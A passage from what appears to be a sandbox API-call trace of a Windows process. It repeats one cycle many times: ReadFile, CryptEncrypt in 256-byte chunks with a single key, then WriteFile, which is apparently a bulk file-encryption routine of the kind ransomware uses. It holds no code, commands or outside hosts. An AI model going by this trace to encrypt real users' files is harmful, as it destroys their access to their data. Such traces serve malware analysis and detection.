pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.519] GetLastError () returned 0x0 [0167.519] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.519] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.519] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.520] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.520] GetLastError () returned 0x0 [0167.520] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.520] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.521] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.521] GetLastError () returned 0x0 [0167.521] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.521] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.522] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.522] GetLastError () returned 0x0 [0167.522] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.523] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.523] GetLastError () returned 0x0 [0167.523] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.523] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.524] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.524] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.524] GetLastError () returned 0x0 [0167.524] WriteFile (in: hFile=0x15c4, 